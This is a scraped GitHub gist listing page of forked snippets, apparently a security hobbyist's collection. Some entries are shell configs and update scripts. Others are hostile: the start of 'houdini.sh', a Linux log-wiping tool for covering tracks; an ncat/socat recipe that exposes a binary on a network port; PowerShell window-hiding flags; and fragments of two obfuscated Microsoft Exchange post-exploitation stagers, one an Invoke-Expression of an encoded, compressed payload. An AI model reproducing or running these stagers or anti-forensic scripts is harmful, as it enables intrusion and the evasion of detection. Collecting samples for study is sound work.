I hereby claim:
- I am gram21 on github.
- I am gramarye (https://keybase.io/gramarye) on keybase.
- I have a public key ASDy0MWdIt7cGUouUXFMjpTXHbADgYf8F8snBTUdS13VZAo
To claim this, I am signing this object:
tehmasta
/ houdini.sh
Created
June 7, 2023 12:10
— forked from QIWIINFO/houdini.sh
Cover your tracks on Linux machines! Article: https://samy.link/blog/is-professional-hackers-also-excellent-magicians
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Naqwada (RuptureFarm 1029) <naqwada@pm.me> | |
| # License: MIT License (http://www.opensource.org/licenses/mit-license.php) | |
| # Docs: https://gitlab.com/-/snippets/2150636 | |
| # Website: http://samy.link/ | |
| # Linkedin: https://www.linkedin.com/in/samy-younsi/ | |
| # Note: FOR EDUCATIONAL PURPOSE ONLY. | |
| #!/bin/bash | |
| LOGS_FILES=( | |
| /var/log/audit/audit.log # Audit TTY input |
tehmasta
/ keybase.md
Created
February 19, 2023 07:36
— forked from Gram21/keybase.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Path to your oh-my-zsh configuration. | |
| ZSH=$HOME/.oh-my-zsh | |
| # Set name of the theme to load. | |
| # Look in ~/.oh-my-zsh/themes/ | |
| # Optionally, if you set this to "random", it'll load a random theme each | |
| # time that oh-my-zsh is loaded. | |
| ZSH_THEME="gnzh" | |
| # Texteditor and zshconfig aliases |
tehmasta
/ gist:43dc2431e476dfadec26ef54c643e2ac
Created
February 19, 2023 07:35
— forked from Gram21/gist:5f8dcddd38800c974299
GDB Debug w/ open connection for remote
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Socat-Version: | |
| gdb socat -exec="set follow-fork-mode child" | |
| r tcp-listen:4444,reuseaddr exec:./binary,PTY,raw,echo=0 | |
| Ncat-Version | |
| gdb ncat -exec="set follow-fork-mode child" | |
| r -l 0.0.0.0 1234 -e ./binary |
tehmasta
/ updateAndUpgrade
Created
February 19, 2023 07:34
— forked from Gram21/updateAndUpgrade
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| r2repo="~/rand/radare2" | |
| echo "Start updating and upgrading. This may take a while" | |
| echo "****************************************************************" | |
| echo "brew..." | |
| brew update --verbose && brew upgrade && brew cleanup | |
| echo "****************************************************************" | |
| echo "pip..." | |
| pip list --format=legacy --outdated | cut -d ' ' -f1 | xargs -n1 pip install -U | |
| pip list --format=legacy --outdated | cut -d ' ' -f1 | xargs -n1 sudo -H pip install -U | |
| echo "****************************************************************" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # util | |
| alias c='clear' | |
| alias r='source ~/.bashrc' | |
| # ls aliases | |
| alias l='ls' | |
| alias ll='ls -alF' | |
| alias la='ls -A' | |
| alias l='ls -CF' |
tehmasta
/ stack_string.py
Created
January 6, 2023 22:42
— forked from JohnHammond/stack_string.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| # NOTE, you must change the string below for data you want. | |
| # This script does not take arguments in its current form. Sorry! | |
| """ | |
| from pwn import * | |
| string = b"foobar" |
tehmasta
/ 188.166.162.201_update.png.ps1
Created
January 6, 2023 19:42
— forked from JohnHammond/188.166.162.201_update.png.ps1
Microsoft Exchange Post-Exploitation Stager 03
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0q2trY9+8d7Og51fQv9++vCX/OL7n977Jb949+HuAf37AB/sfnqwRx/v0m979/Hpwf19+nd37wH9e+8Bfr//EO2oIQHZx+d7Ow+55R7B2tu7j08ePqR/9+/vMZhP0fweQN6/j9YH+2ixTx/f2wOoA3y8u7sD4Pce7uDfe3jz4QG62MGvDw7o9YOH6OAeUN57AJQPGO979/Diw08B+/4+Wu9+uo8v6YMHD/aAE+O9t4tP9zH2h/fw770H1OLeAY+Jh8GfPtz5FN/tE2Z7B7v8Isixt/8p4wRc7+2g408PQJNP76H5w/v06qeAvftgj4f3KX+8Q7g+fAgcuN2DByD3AQhLOOH3e3jn/qfUwT0M4P7eLndO/wLzfQznIbp/uA+ou59S630A2eOWB8CVSCsvAeruHn3ykGdiB8jvMZY04HsYO/Vw8Cn9/QBw97nVp5jBTxnnXfRxAFrt7e9SR/dADwIIAHsA8OkuxrDLY3gA0t//lIe2C0I8xL/3QdIDoL+3u8Nsgn8Jb559JtgeBnb/HpA9OMDgMdcPgMXBAWi2Q589uIeWuyDq7kOewp0dgvApyLl3IKQFczxk9j1gPPe510+ZJUC++/hqB1TavbfDfMe0BdX39h8QVg93gdp9JtvOfSB7nyXgITj7ocwRhIEEg5lo54D/Red74C1hjgd4/x7Itfspt4N0fMpcvMd4PWC+fgCZ293H7NAr6PhTxn0XuO4e7DDRMV6aWEa |
tehmasta
/ powershell_quiet.ps1
Created
January 6, 2023 19:41
— forked from JohnHammond/powershell_quiet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $s.UseShellExecute=$false; | |
| $s.RedirectStandardOutput=$true; | |
| $s.WindowStyle='Hidden'; | |
| $s.CreateNoWindow=$true; |
tehmasta
/ 188.166.162.201_update_stager.ps1
Created
January 6, 2023 19:40
— forked from JohnHammond/188.166.162.201_update_stager.ps1
Microsoft Exchange Post-Exploitation Stager 04
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189 |
NewerOlder